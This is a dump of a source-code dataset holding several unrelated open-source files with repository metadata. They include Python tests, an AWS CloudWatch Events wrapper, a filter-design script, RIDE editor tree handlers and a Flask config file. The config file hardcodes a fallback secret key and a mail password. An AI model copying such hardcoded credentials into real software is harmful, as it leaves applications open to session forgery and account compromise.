sdk/python/tests/integration/feature_repos/universal/data_source_creator.py
|
marsishandsome/feast
|
998e16945da240bfa73570cdb2c5e3639f892d34
|
[
"Apache-2.0"
] | null | null | null |
from abc import ABC, abstractmethod
from typing import Dict
import pandas as pd
from feast.data_source import DataSource
from feast.repo_config import FeastConfigBaseModel
class DataSourceCreator(ABC):
@abstractmethod
def create_data_source(
self,
destination: str,
df: pd.DataFrame,
event_timestamp_column="ts",
created_timestamp_column="created_ts",
field_mapping: Dict[str, str] = None,
) -> DataSource:
...
@abstractmethod
def create_offline_store_config(self) -> FeastConfigBaseModel:
...
@abstractmethod
def teardown(self):
...
@abstractmethod
def get_prefixed_table_name(self, name: str, suffix: str) -> str:
...
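# Minimal illustrative subclass (hypothetical, for demonstration only) showing
# the surface a concrete creator must implement; real creators build
# backend-specific data sources and offline store configs.
class NoopDataSourceCreator(DataSourceCreator):
    def create_data_source(
        self,
        destination: str,
        df: pd.DataFrame,
        event_timestamp_column="ts",
        created_timestamp_column="created_ts",
        field_mapping: Dict[str, str] = None,
    ) -> DataSource:
        raise NotImplementedError("backend-specific: turn df into a DataSource")
    def create_offline_store_config(self) -> FeastConfigBaseModel:
        raise NotImplementedError("backend-specific offline store config")
    def teardown(self):
        pass  # nothing to clean up in this sketch
    def get_prefixed_table_name(self, name: str, suffix: str) -> str:
        return "{}_{}".format(name, suffix)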
| 22.515152
| 69
| 0.664872
| 566
| 0.761777
| 0
| 0
| 514
| 0.69179
| 0
| 0
| 16
| 0.021534
|
42683ff20338aa58755c4a687ba9b5618ac5ee33
| 1,393
|
py
|
Python
|
tests/interpreter/expression/var_assignment_interpreter_test.py
|
OtavioHenrique/yalul
|
ce99e32365ed5607527b9f2f39705ad5d9e20ba2
|
[
"MIT"
] | 1
|
2021-04-01T20:22:36.000Z
|
2021-04-01T20:22:36.000Z
|
tests/interpreter/expression/var_assignment_interpreter_test.py
|
OtavioHenrique/yalul
|
ce99e32365ed5607527b9f2f39705ad5d9e20ba2
|
[
"MIT"
] | 1
|
2020-11-20T22:24:38.000Z
|
2020-11-20T22:24:38.000Z
|
tests/interpreter/expression/var_assignment_interpreter_test.py
|
OtavioHenrique/yalul
|
ce99e32365ed5607527b9f2f39705ad5d9e20ba2
|
[
"MIT"
] | null | null | null |
from yalul.interpreters.environment import Environment
from yalul.interpreters.expressions.var_assignment_interpreter import VarAssignmentInterpreter
from yalul.interpreters.interpreter_errors import InterpreterErrors
class TestVarAssignmentInterpreter:
"""Test var assignment expression interpreter"""
def test_interpreting_var_assignment_without_errors(self):
"""
        Validates that VarAssignmentInterpreter interprets an assignment correctly
"""
error = InterpreterErrors()
env = Environment({}, {})
env.add_variable('Name', 'Gabriela')
interpreter = VarAssignmentInterpreter('Name', 'Otavio', env, error)
response = interpreter.execute()
assert response == 'Otavio'
assert env.get_variable('Name') == 'Otavio'
assert error.errors == []
def test_interpreting_var_assignment_errors(self):
"""
        Validates that VarAssignmentInterpreter generates an error when the variable doesn't exist
"""
error = InterpreterErrors()
env = Environment({}, {})
interpreter = VarAssignmentInterpreter('Name', 'Otavio', env, error)
response = interpreter.execute()
assert response is None
assert error.errors == ['Interpreter Error: Can\'t assign value Otavio to variable named "Name" because it '
'doesn\'t exists']
| 34.825
| 116
| 0.676238
| 1,172
| 0.84135
| 0
| 0
| 0
| 0
| 0
| 0
| 411
| 0.295047
|
4268f94ca522ab0b564db536a3198008325ec23d
| 2,547
|
py
|
Python
|
backend/externals/events.py
|
crosspower/naruko
|
4c524e2ef955610a711830bc86d730ffe4fc2bd8
|
[
"MIT"
] | 17
|
2019-01-23T04:37:43.000Z
|
2019-10-15T01:42:31.000Z
|
backend/externals/events.py
|
snickerjp/naruko
|
4c524e2ef955610a711830bc86d730ffe4fc2bd8
|
[
"MIT"
] | 1
|
2019-01-23T08:04:44.000Z
|
2019-01-23T08:44:33.000Z
|
backend/externals/events.py
|
snickerjp/naruko
|
4c524e2ef955610a711830bc86d730ffe4fc2bd8
|
[
"MIT"
] | 6
|
2019-01-23T09:10:59.000Z
|
2020-12-02T04:15:41.000Z
|
import boto3
from django.conf import settings
from backend.models import CloudWatchEvent
import json
class Events:
def __init__(self):
self.client = boto3.client('events', region_name=settings.NARUKO_REGION)
def list_rules(self):
response = []
for rules in self._list_rules():
response.extend(rules)
return response
def _list_rules(self):
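        """Yield pages of rules prefixed with 'NARUKO-', following NextToken pagination."""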
        # First call is made without a token
response = self.client.list_rules(NamePrefix='NARUKO-')
token = response.get("NextToken")
yield self._build_cloudwatchevent(response["Rules"])
        # While a token exists, yield the next page
while token:
response = self.client.list_rules(
NamePrefix='NARUKO-',
NextToken=token
)
token = response.get("NextToken")
yield self._build_cloudwatchevent(response["Rules"])
@staticmethod
def _build_cloudwatchevent(rules: dict):
cloudwatchevents = []
for rule in rules:
cloudwatchevents.append(CloudWatchEvent(
name=rule["Name"],
schedule_expression=rule.get("ScheduleExpression"),
is_active=rule["State"] == "ENABLED"
))
return cloudwatchevents
def save_event(self, event):
        # Create the rule
self.client.put_rule(
Name=event.cloudwatchevent.name,
ScheduleExpression=event.cloudwatchevent.schedule_expression,
State="ENABLED" if event.cloudwatchevent.is_active else "DISABLED"
)
        # Create the target
target = dict(
Id=event.cloudwatchevent.name,
Arn=settings.EVENT_SNS_TOPIC_ARN,
Input=json.dumps(dict(id=event.event_model.id))
)
self.client.put_targets(
Rule=event.cloudwatchevent.name,
Targets=[target]
)
return event
def delete_event(self, event_name):
        # Remove the targets
self.client.remove_targets(
Rule=event_name,
Ids=[event_name]
)
        # Delete the rule
self.client.delete_rule(
Name=event_name
)
def describe_event(self, event_name):
response = self.client.describe_rule(
Name=event_name
)
return CloudWatchEvent(
name=response["Name"],
schedule_expression=response["ScheduleExpression"],
is_active=response["State"] == "ENABLED"
)
| 28.617978
| 81
| 0.568512
| 2,516
| 0.957746
| 546
| 0.207842
| 380
| 0.144652
| 0
| 0
| 313
| 0.119147
|
4269db32f55f118da9ba1a4ffe9262967fe30e06
| 283
|
py
|
Python
|
1501-1600/1560-Most Visited Sector in a Circular Track/1560-Most Visited Sector in a Circular Track.py
|
jiadaizhao/LeetCode
|
4ddea0a532fe7c5d053ffbd6870174ec99fc2d60
|
[
"MIT"
] | 49
|
2018-05-05T02:53:10.000Z
|
2022-03-30T12:08:09.000Z
|
1501-1600/1560-Most Visited Sector in a Circular Track/1560-Most Visited Sector in a Circular Track.py
|
ptx-c/LeetCode
|
4ddea0a532fe7c5d053ffbd6870174ec99fc2d60
|
[
"MIT"
] | 11
|
2017-12-15T22:31:44.000Z
|
2020-10-02T12:42:49.000Z
|
1501-1600/1560-Most Visited Sector in a Circular Track/1560-Most Visited Sector in a Circular Track.py
|
ptx-c/LeetCode
|
4ddea0a532fe7c5d053ffbd6870174ec99fc2d60
|
[
"MIT"
] | 28
|
2017-12-05T10:56:51.000Z
|
2022-01-26T18:18:27.000Z
|
from typing import List
class Solution:
def mostVisited(self, n: int, rounds: List[int]) -> List[int]:
start, end = rounds[0], rounds[-1]
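        # Every full lap visits all sectors equally, so only the start and
        # end positions matter: the most-visited sectors run from start to
        # end, wrapping past n back to sector 1 when end < start.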
if end >= start:
return list(range(start, end + 1))
else:
return list(range(1, end + 1)) + list(range(start, n + 1))
| 35.375
| 70
| 0.533569
| 282
| 0.996466
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
426a3bed4febe19951912ab6a1ea3a6374609094
| 356
|
py
|
Python
|
eg/deparse/example.py
|
KennethBlaney/rivescript-python
|
87db472847ab526060afd9a5b8548e9689501a85
|
[
"MIT"
] | null | null | null |
eg/deparse/example.py
|
KennethBlaney/rivescript-python
|
87db472847ab526060afd9a5b8548e9689501a85
|
[
"MIT"
] | null | null | null |
eg/deparse/example.py
|
KennethBlaney/rivescript-python
|
87db472847ab526060afd9a5b8548e9689501a85
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# Manipulate sys.path to be able to import converscript from this local git
# repository.
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "..", ".."))
from converscript import RiveScript
import json
bot = RiveScript()
bot.load_file("example.rive")
dep = bot.deparse()
print(json.dumps(dep, indent=2))
| 20.941176
| 75
| 0.735955
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 131
| 0.367978
|
426a6f57e84f4626e97b52d506e5d77552f5cfca
| 2,715
|
py
|
Python
|
figuras/PycharmKayStatisticalReport/example_8_11.py
|
bor9/estudiando_el_kay
|
6e07908b8b0b5a5166dadce30001e6100e8304c3
|
[
"MIT"
] | null | null | null |
figuras/PycharmKayStatisticalReport/example_8_11.py
|
bor9/estudiando_el_kay
|
6e07908b8b0b5a5166dadce30001e6100e8304c3
|
[
"MIT"
] | null | null | null |
figuras/PycharmKayStatisticalReport/example_8_11.py
|
bor9/estudiando_el_kay
|
6e07908b8b0b5a5166dadce30001e6100e8304c3
|
[
"MIT"
] | 1
|
2021-11-02T05:27:27.000Z
|
2021-11-02T05:27:27.000Z
|
import matplotlib.pyplot as plt
import numpy as np
from scipy import signal, linalg
from matplotlib import rc
from matplotlib import rcParams
__author__ = 'ernesto'
# if use latex or mathtext
rc('text', usetex=True)
rcParams['text.latex.preamble'] = [r"\usepackage{amsmath}"]
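# Least-squares (Prony-style) design of a rational (IIR) filter of order
# (p, q) that approximates a desired FIR impulse response (Kay, Example 8.11).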
# desired impulse response: sinc
N = 50  # even number
fc = 0.1
nf = 1024
n = np.arange(-N/2, N/2+1)
N += 1
f = np.arange(nf)/(2 * nf)
# parameters of the filter to be designed
p = 10
q = 10
# impulse response
hd = 2 * fc * np.sinc(2 * fc * n) # * np.hanning(N)
# frequency response
_, Hd = signal.freqz(hd, a=1, worN=nf, whole=False, plot=None)
# estimation of the denominator coefficients (a)
# hd = np.arange(N)
x = hd[q + 1:]
H = linalg.toeplitz(hd[q: N - 1], hd[q: q - p: -1])
# a_est = np.linalg.solve(H.T @ H, -H.T @ x)
epsilon = 1e-16
#epsilon = 0
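# Ridge-regularized normal equations: solve (H^T H + eps*I) a = -H^T x
# instead of the plain least-squares solve above; the small eps keeps the
# system well-conditioned.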
a_est = linalg.solve(H.T @ H + epsilon * np.eye(p), -H.T @ x)
print("Número de Condición 1: {}".format(np.linalg.cond(H.T @ H)))
h = hd[: q + 1]
H0 = linalg.toeplitz(np.concatenate(([0], hd[: q])), np.zeros((p, )))
b_est = h + H0 @ a_est
#print(h)
#print(H0)
# frequency response
a_est = np.concatenate(([1], a_est))
print(a_est)
print(b_est)
_, H_est = signal.freqz(b_est, a_est, worN=nf, whole=False, plot=None)
# impulse response
delta = np.zeros((N,))
delta[0] = 1
h_est = signal.lfilter(b_est, a_est, delta, axis=- 1, zi=None)
ms = 3
fs = 12
n = np.arange(N)
fig = plt.figure(0, figsize=(9, 5), frameon=False)
ax = plt.subplot2grid((8, 2), (0, 0), rowspan=6, colspan=1)
plt.xlim(0, N-1)
plt.ylim(np.amin(hd)-0.02, np.amax(hd)+0.02)
plt.plot(n, hd, linestyle='-', marker='s', color='k', markersize=ms, lw=1, label='${\\rm desired}$')
plt.plot(n, h_est, linestyle='-', marker='s', color='r', markersize=ms, lw=1, label='${\\rm estimated}$')
leg = plt.legend(loc=1, frameon=False, fontsize=fs)
ax.set_xticklabels([])
ax.set_ylabel('${\\rm Impulse\;response}$', fontsize=fs)
ax = plt.subplot2grid((8, 2), (6, 0), rowspan=2, colspan=1)
e = hd-h_est
plt.xlim(0, N-1)
plt.ylim(np.amin(e)-0.001, np.amax(e)+0.001)
plt.plot(n, e, linestyle='-', marker='s', color='k', markersize=ms)
ax.set_xlabel(r'$n$', fontsize=fs)
ax.set_ylabel(r'$\epsilon[n]$', fontsize=fs)
ax = plt.subplot2grid((8, 2), (0, 1), rowspan=8, colspan=1)
plt.xlim(0, 0.5)
plt.ylim(-55, 8)
plt.plot(f, 10 * np.log10(np.abs(Hd)), 'k', label='${\\rm desired}$')
plt.plot(f, 10 * np.log10(np.abs(H_est)), 'r', label='${\\rm estimated}$')
ax.set_xlabel('${\\rm Normalized\;frequency}$', fontsize=fs)
ax.set_ylabel('${\\rm Frequency\;response\;(dB)}$', fontsize=fs)
leg = plt.legend(loc=1, frameon=False, fontsize=fs)
plt.savefig('example_8_11.pdf', bbox_inches='tight')
plt.show()
| 29.835165
| 104
| 0.64825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 717
| 0.263603
|
426b013c87350379997d161bc0ecdefe4dd2b27e
| 19,353
|
py
|
Python
|
src/robotide/ui/treenodehandlers.py
|
crylearner/RIDE3X
|
767f45b0c908f18ecc7473208def8dc7489f43b0
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2017-08-20T14:46:02.000Z
|
2017-08-20T14:46:02.000Z
|
src/robotide/ui/treenodehandlers.py
|
crylearner/RIDE3X
|
767f45b0c908f18ecc7473208def8dc7489f43b0
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/robotide/ui/treenodehandlers.py
|
crylearner/RIDE3X
|
767f45b0c908f18ecc7473208def8dc7489f43b0
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import wx
from robotide.controller.commands import (
RenameKeywordOccurrences, RemoveMacro, AddKeyword, AddTestCase, RenameTest,
CopyMacroAs, AddVariable, UpdateVariableName, RenameFile,
RenameResourceFile, DeleteFile, SortKeywords, Include, Exclude)
from robotide.controller.settingcontrollers import VariableController
from robotide.controller.macrocontrollers import (
TestCaseController, UserKeywordController)
from robotide.controller.filecontrollers import (
TestDataDirectoryController, ResourceFileController,
TestCaseFileController, ExcludedDirectoryController,
DirtyRobotDataException)
from robotide.editor.editordialogs import (
TestCaseNameDialog, UserKeywordNameDialog, ScalarVariableDialog,
ListVariableDialog, CopyUserKeywordDialog, DictionaryVariableDialog)
from robotide.publish import RideOpenVariableDialog
from robotide.ui.progress import LoadProgressObserver
from robotide.usages.UsageRunner import Usages, ResourceFileUsages
from .filedialogs import (
AddSuiteDialog, AddDirectoryDialog, ChangeFormatDialog, NewResourceDialog,
RobotFilePathDialog)
from robotide.utils import overrides
from robotide.widgets import PopupMenuItems
from .progress import RenameProgressObserver
from .resourcedialogs import ResourceRenameDialog, ResourceDeleteDialog
from robotide.ui.resourcedialogs import FolderDeleteDialog
def action_handler_class(controller):
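    """Return the tree node handler class for the given controller's type."""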
return {
TestDataDirectoryController: TestDataDirectoryHandler,
ResourceFileController: ResourceFileHandler,
TestCaseFileController: TestCaseFileHandler,
TestCaseController: TestCaseHandler,
UserKeywordController: UserKeywordHandler,
VariableController: VariableHandler,
ExcludedDirectoryController: ExcludedDirectoryHandler
}[controller.__class__]
class _ActionHandler(wx.Window):
is_user_keyword = False
is_test_suite = False
is_variable = False
_label_add_suite = 'New Suite\tCtrl-Shift-F'
_label_add_directory = 'New Directory'
_label_new_test_case = 'New Test Case\tCtrl-Shift-T'
_label_new_user_keyword = 'New User Keyword\tCtrl-Shift-K'
_label_sort_keywords = 'Sort Keywords'
_label_new_scalar = 'New Scalar\tCtrl-Shift-V'
_label_new_list_variable = 'New List Variable\tCtrl-Shift-L'
_label_new_dict_variable = 'New Dictionary Variable'
_label_change_format = 'Change Format'
_label_copy_macro = 'Copy\tCtrl-Shift-C'
_label_rename = 'Rename\tF2'
_label_add_resource = 'Add Resource'
_label_new_resource = 'New Resource'
_label_find_usages = 'Find Usages'
_label_select_all = 'Select All Tests'
_label_deselect_all = 'Deselect All Tests'
_label_select_failed_tests = 'Select Only Failed Tests'
_label_select_passed_tests = 'Select Only Passed Tests'
_label_delete = 'Delete\tCtrl-Shift-D'
_label_delete_no_kbsc = 'Delete'
_label_exclude = 'Exclude'
_label_include = 'Include'
_label_expand_all = 'Expand all'
_label_collapse_all = 'Collapse all'
def __init__(self, controller, tree, node, settings):
wx.Window.__init__(self, tree)
self.controller = controller
self._tree = tree
self._node = node
self._settings = settings
self._rendered = False
self.Show(False)
self._popup_creator = tree._popup_creator
@property
def item(self):
return self.controller.data
@property
def node(self):
return self._node
def show_popup(self):
self._popup_creator.show(self, PopupMenuItems(self, self._actions),
self.controller)
def begin_label_edit(self):
return False
def double_clicked(self):
pass
def end_label_edit(self, event):
pass
def OnDelete(self, event):
pass
def OnNewSuite(self, event):
pass
def OnNewDirectory(self, event):
pass
def OnNewResource(self, event):
pass
def OnNewUserKeyword(self, event):
pass
def OnNewTestCase(self, event):
pass
def OnNewScalar(self, event):
pass
def OnNewListVariable(self, event):
pass
def OnNewDictionaryVariable(self, event):
pass
def OnCopy(self, event):
pass
def OnFindUsages(self, event):
pass
def OnSelectAllTests(self, event):
self._tree.SelectAllTests(self._node)
def OnDeselectAllTests(self, event):
self._tree.DeselectAllTests(self._node)
def OnSelectOnlyFailedTests(self, event):
self._tree.SelectFailedTests(self._node)
def OnSelectOnlyPassedTests(self, event):
self._tree.SelectPassedTests(self._node)
def OnSafeDelete(self, event):
pass
def OnExclude(self, event):
pass
def OnInclude(self, event):
pass
class _CanBeRenamed(object):
def OnRename(self, event):
self._tree.label_editor.OnLabelEdit()
def begin_label_edit(self):
def label_edit():
# FIXME: yep.yep.yep.yep.yep
node = self._tree._controller.find_node_by_controller(
self.controller)
if node:
self._tree.EditLabel(node)
# Must handle pending events before label edit
# This is a fix for situations where there is a pending action
# that will change this label (Text Editor all changing actions)
wx.CallAfter(label_edit)
return True
def end_label_edit(self, event):
if not event.IsEditCancelled():
if self._is_valid_rename(event.GetLabel()):
self.rename(event.GetLabel())
else:
event.Veto()
def _is_valid_rename(self, label):
validation = self.controller.validate_name(label)
if validation.error_message:
self._show_validation_error(validation.error_message)
return False
return True
def _show_validation_error(self, err_msg):
wx.MessageBox(err_msg, 'Validation Error', style=wx.ICON_ERROR)
class DirectoryHandler(_ActionHandler):
is_draggable = False
is_test_suite = False
can_be_rendered = False
_actions = [_ActionHandler._label_new_resource]
def OnNewResource(self, event):
NewResourceDialog(self.controller, self._settings).execute()
class TestDataHandler(_ActionHandler):
accepts_drag = lambda self, dragged: \
(isinstance(dragged, UserKeywordHandler) or
isinstance(dragged, VariableHandler))
is_draggable = False
is_test_suite = True
@property
def tests(self):
return self.controller.tests
@property
def keywords(self):
return self.controller.keywords
@property
def variables(self):
return self.controller.variables
def has_been_modified_on_disk(self):
return self.item.has_been_modified_on_disk()
def do_drop(self, item):
self.controller.add_test_or_keyword(item)
def rename(self, new_name):
return False
def OnSortKeywords(self, event):
"""Sorts the keywords inside the treenode"""
self.controller.execute(SortKeywords())
@property
def can_be_rendered(self):
if not self._has_children():
return False
return not self._rendered
def _has_children(self):
return (self.item.keyword_table or self.item.testcase_table or
self.item.variable_table)
def set_rendered(self):
self._rendered = True
def OnChangeFormat(self, event):
ChangeFormatDialog(self.controller).execute()
def OnNewUserKeyword(self, event):
dlg = UserKeywordNameDialog(self.controller)
if dlg.ShowModal() == wx.ID_OK:
self.controller.execute(AddKeyword(dlg.get_name(), dlg.get_args()))
dlg.Destroy()
def OnNewScalar(self, event):
self._new_var(ScalarVariableDialog)
def OnNewListVariable(self, event):
class FakePlugin(object):
global_settings = self._settings
self._new_var(ListVariableDialog, plugin=FakePlugin())
def OnNewDictionaryVariable(self, event):
class FakePlugin(object):
global_settings = self._settings
self._new_var(DictionaryVariableDialog, plugin=FakePlugin())
def _new_var(self, dialog_class, plugin=None):
dlg = dialog_class(self._var_controller, plugin=plugin)
if dlg.ShowModal() == wx.ID_OK:
name, value = dlg.get_value()
comment = dlg.get_comment()
self.controller.execute(AddVariable(name, value, comment))
@property
def _var_controller(self):
return self.controller.datafile_controller.variables
class TestDataDirectoryHandler(TestDataHandler):
def __init__(self, *args):
TestDataHandler.__init__(self, *args)
self._actions = [
_ActionHandler._label_add_suite,
_ActionHandler._label_add_directory,
_ActionHandler._label_new_resource,
'---',
_ActionHandler._label_new_user_keyword,
_ActionHandler._label_new_scalar,
_ActionHandler._label_new_list_variable,
_ActionHandler._label_new_dict_variable,
'---',
_ActionHandler._label_change_format
]
if self.controller.parent:
self._actions.extend([_ActionHandler._label_delete_no_kbsc])
self._actions.extend([
'---',
_ActionHandler._label_select_all,
_ActionHandler._label_deselect_all,
_ActionHandler._label_select_failed_tests,
_ActionHandler._label_select_passed_tests
])
if self.controller.parent:
self._actions.extend(['---',
_ActionHandler._label_exclude])
self._actions.extend(['---',
_ActionHandler._label_expand_all,
_ActionHandler._label_collapse_all])
def OnExpandAll(self, event):
self._tree.ExpandAllSubNodes(self._node)
def OnCollapseAll(self, event):
self._tree.CollapseAllSubNodes(self._node)
def OnNewSuite(self, event):
AddSuiteDialog(self.controller, self._settings).execute()
def OnNewDirectory(self, event):
AddDirectoryDialog(self.controller, self._settings).execute()
def OnNewResource(self, event):
NewResourceDialog(self.controller, self._settings).execute()
def OnDelete(self, event):
FolderDeleteDialog(self.controller).execute()
def OnExclude(self, event):
try:
self.controller.execute(Exclude())
except DirtyRobotDataException:
wx.MessageBox('Directory contains unsaved data!\n'
'You must save data before excluding.')
class _FileHandlerThanCanBeRenamed(_CanBeRenamed):
@overrides(_CanBeRenamed)
def begin_label_edit(self):
self._old_label = self._node.GetText()
self._set_node_label(self.controller.basename)
return _CanBeRenamed.begin_label_edit(self)
@overrides(_CanBeRenamed)
def end_label_edit(self, event):
if not event.IsEditCancelled():
result = self.controller.execute(
self._rename_command(event.GetLabel()))
if result:
self._rename_ok_handler()
self._old_label = self.controller.basename
else:
event.Veto()
else:
self._set_node_label(self._old_label)
def _rename_ok_handler(self):
pass
def _rename_command(self, label):
raise NotImplementedError(self.__class__)
def _set_node_label(self, label):
self._tree.SetItemText(self._node, label)
class ResourceFileHandler(_FileHandlerThanCanBeRenamed, TestDataHandler):
is_test_suite = False
_actions = [_ActionHandler._label_new_user_keyword,
_ActionHandler._label_new_scalar,
_ActionHandler._label_new_list_variable,
_ActionHandler._label_new_dict_variable,
'---',
_ActionHandler._label_rename,
_ActionHandler._label_change_format,
_ActionHandler._label_sort_keywords,
_ActionHandler._label_find_usages,
_ActionHandler._label_delete]
def OnFindUsages(self, event):
ResourceFileUsages(self.controller, self._tree.highlight).show()
def OnDelete(self, event):
ResourceDeleteDialog(self.controller).execute()
def OnSafeDelete(self, event):
return self.OnDelete(event)
@overrides(_FileHandlerThanCanBeRenamed)
def _rename_command(self, label):
return RenameResourceFile(
label, self._check_should_rename_static_imports)
def _check_should_rename_static_imports(self):
return ResourceRenameDialog(self.controller).execute()
class TestCaseFileHandler(_FileHandlerThanCanBeRenamed, TestDataHandler):
accepts_drag = lambda *args: True
_actions = [_ActionHandler._label_new_test_case,
_ActionHandler._label_new_user_keyword,
_ActionHandler._label_new_scalar,
_ActionHandler._label_new_list_variable,
_ActionHandler._label_new_dict_variable,
'---',
_ActionHandler._label_rename,
_ActionHandler._label_change_format,
_ActionHandler._label_sort_keywords,
_ActionHandler._label_delete,
'---',
_ActionHandler._label_select_all,
_ActionHandler._label_deselect_all,
_ActionHandler._label_select_failed_tests,
_ActionHandler._label_select_passed_tests
]
def OnNewTestCase(self, event):
dlg = TestCaseNameDialog(self.controller)
if dlg.ShowModal() == wx.ID_OK:
self.controller.execute(AddTestCase(dlg.get_name()))
dlg.Destroy()
def OnDelete(self, event):
if wx.MessageBox('Delete test case file', caption='Confirm',
style=wx.YES_NO | wx.ICON_QUESTION) == wx.YES:
self.controller.execute(DeleteFile())
def OnSafeDelete(self, event):
return self.OnDelete(event)
@overrides(_FileHandlerThanCanBeRenamed)
def _rename_command(self, label):
return RenameFile(label)
@overrides(_FileHandlerThanCanBeRenamed)
def _rename_ok_handler(self):
self._tree.DeselectAllTests(self._node)
class _TestOrUserKeywordHandler(_CanBeRenamed, _ActionHandler):
accepts_drag = lambda *args: False
is_draggable = True
_actions = [
_ActionHandler._label_copy_macro, 'Move Up\tCtrl-Up',
'Move Down\tCtrl-Down', _ActionHandler._label_rename, '---', 'Delete'
]
def remove(self):
self.controller.delete()
def rename(self, new_name):
self.controller.execute(self._create_rename_command(new_name))
def OnCopy(self, event):
dlg = self._copy_name_dialog_class(self.controller, self.item)
if dlg.ShowModal() == wx.ID_OK:
self.controller.execute(CopyMacroAs(dlg.get_name()))
dlg.Destroy()
def OnMoveUp(self, event):
if self.controller.move_up():
self._tree.move_up(self._node)
def OnMoveDown(self, event):
if self.controller.move_down():
self._tree.move_down(self._node)
def OnDelete(self, event):
self.controller.execute(RemoveMacro(self.controller))
class TestCaseHandler(_TestOrUserKeywordHandler):
_datalist = property(lambda self: self.item.datalist)
_copy_name_dialog_class = TestCaseNameDialog
def _add_copy_to_tree(self, parent_node, copied):
self._tree.add_test(parent_node, copied)
def _create_rename_command(self, new_name):
return RenameTest(new_name)
class UserKeywordHandler(_TestOrUserKeywordHandler):
is_user_keyword = True
_datalist = property(lambda self: self.item.datalist)
_copy_name_dialog_class = CopyUserKeywordDialog
_actions = _TestOrUserKeywordHandler._actions + [
_ActionHandler._label_find_usages]
def _add_copy_to_tree(self, parent_node, copied):
self._tree.add_keyword(parent_node, copied)
def _create_rename_command(self, new_name):
return RenameKeywordOccurrences(
self.controller.name, new_name,
RenameProgressObserver(self.GetParent().GetParent()),
self.controller.info)
def OnFindUsages(self, event):
Usages(self.controller, self._tree.highlight).show()
class VariableHandler(_CanBeRenamed, _ActionHandler):
accepts_drag = lambda *args: False
is_draggable = True
is_variable = True
OnMoveUp = OnMoveDown = lambda *args: None
_actions = [_ActionHandler._label_rename, 'Delete']
@overrides(_ActionHandler)
def double_clicked(self):
RideOpenVariableDialog(controller=self.controller).publish()
def OnDelete(self, event):
self.remove()
def remove(self):
self.controller.delete()
def rename(self, new_name):
self.controller.execute(UpdateVariableName(new_name))
@property
def index(self):
return self.controller.index
class ResourceRootHandler(_ActionHandler):
can_be_rendered = is_draggable = is_user_keyword = is_test_suite = False
rename = lambda self, new_name: False
accepts_drag = lambda self, dragged: False
_actions = [_ActionHandler._label_add_resource]
@property
def item(self):
return None
def OnAddResource(self, event):
path = RobotFilePathDialog(
self, self.controller, self._settings).execute()
if path:
self.controller.load_resource(path, LoadProgressObserver(self))
class ExcludedDirectoryHandler(TestDataDirectoryHandler):
is_draggable = False
is_test_suite = True
def __init__(self, *args):
TestDataHandler.__init__(self, *args)
self._actions = [_ActionHandler._label_include]
def OnInclude(self, event):
self.controller.execute(Include())
| 33.598958
| 80
| 0.661965
| 16,783
| 0.867204
| 0
| 0
| 1,914
| 0.098899
| 0
| 0
| 1,532
| 0.079161
|
426e4afa33488c3f61e9819e1e0e8ab285e730fe
| 902
|
py
|
Python
|
config.py
|
rajatomar788/pyblog
|
d450dc1ceb3a6b3aeb747648a0fb1b4334e4b3ae
|
[
"MIT"
] | null | null | null |
config.py
|
rajatomar788/pyblog
|
d450dc1ceb3a6b3aeb747648a0fb1b4334e4b3ae
|
[
"MIT"
] | null | null | null |
config.py
|
rajatomar788/pyblog
|
d450dc1ceb3a6b3aeb747648a0fb1b4334e4b3ae
|
[
"MIT"
] | null | null | null |
import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config(object):
SECRET_KEY = os.environ.get('SECRET_KEY') or 'rajatomar788'
if os.environ.get('DATABASE_URL') is None:
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'app.db')
elif os.environ.get('EXTRA_DATABASE') is not None:
SQLALCHEMY_DATABASE_URI = os.environ['EXTRA_DATABASE']
else:
SQLALCHEMY_DATABASE_URI = os.environ['DATABASE_URL']
SQLALCHEMY_TRACK_MODIFICATIONS = False
MAX_SEARCH_RESULTS = 50
POSTS_PER_PAGE = 20
basedir = basedir
ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])
MAX_CONTENT_PATH = 16*1024*1024
#mail server settings
MAIL_SERVER = 'localhost'
MAIL_PORT = 25
MAIL_USERNAME = 'Raja'
MAIL_PASSWORD = 'raja788'
#administrator list
ADMINS = ['rajatomar788@gmail.com']
| 29.096774
| 80
| 0.674058
| 837
| 0.927938
| 0
| 0
| 0
| 0
| 0
| 0
| 227
| 0.251663
|
426e9a71b5a0425ef77735be32bb8398f28a2e1e
| 45
|
py
|
Python
|
ceefax/fonts/size7extracondensed/__init__.py
|
mscroggs/CEEFAX
|
8e7a075de1809064b77360da24ebbbaa409c3bf2
|
[
"MIT"
] | 1
|
2020-03-28T15:53:22.000Z
|
2020-03-28T15:53:22.000Z
|
ceefax/fonts/size7extracondensed/__init__.py
|
mscroggs/CEEFAX
|
8e7a075de1809064b77360da24ebbbaa409c3bf2
|
[
"MIT"
] | 1
|
2021-02-05T13:43:52.000Z
|
2021-02-05T13:43:52.000Z
|
ceefax/fonts/size7extracondensed/__init__.py
|
mscroggs/CEEFAX
|
8e7a075de1809064b77360da24ebbbaa409c3bf2
|
[
"MIT"
] | null | null | null |
from .default import size7extracondensedfont
| 22.5
| 44
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
426e9a7b517f49d7e52664e4ad563ce95c7c8446
| 3,433
|
py
|
Python
|
bom/helpers.py
|
gxyp/indabom
|
114991be2471eda2cf658c68706ab7bb05b06959
|
[
"MIT"
] | null | null | null |
bom/helpers.py
|
gxyp/indabom
|
114991be2471eda2cf658c68706ab7bb05b06959
|
[
"MIT"
] | null | null | null |
bom/helpers.py
|
gxyp/indabom
|
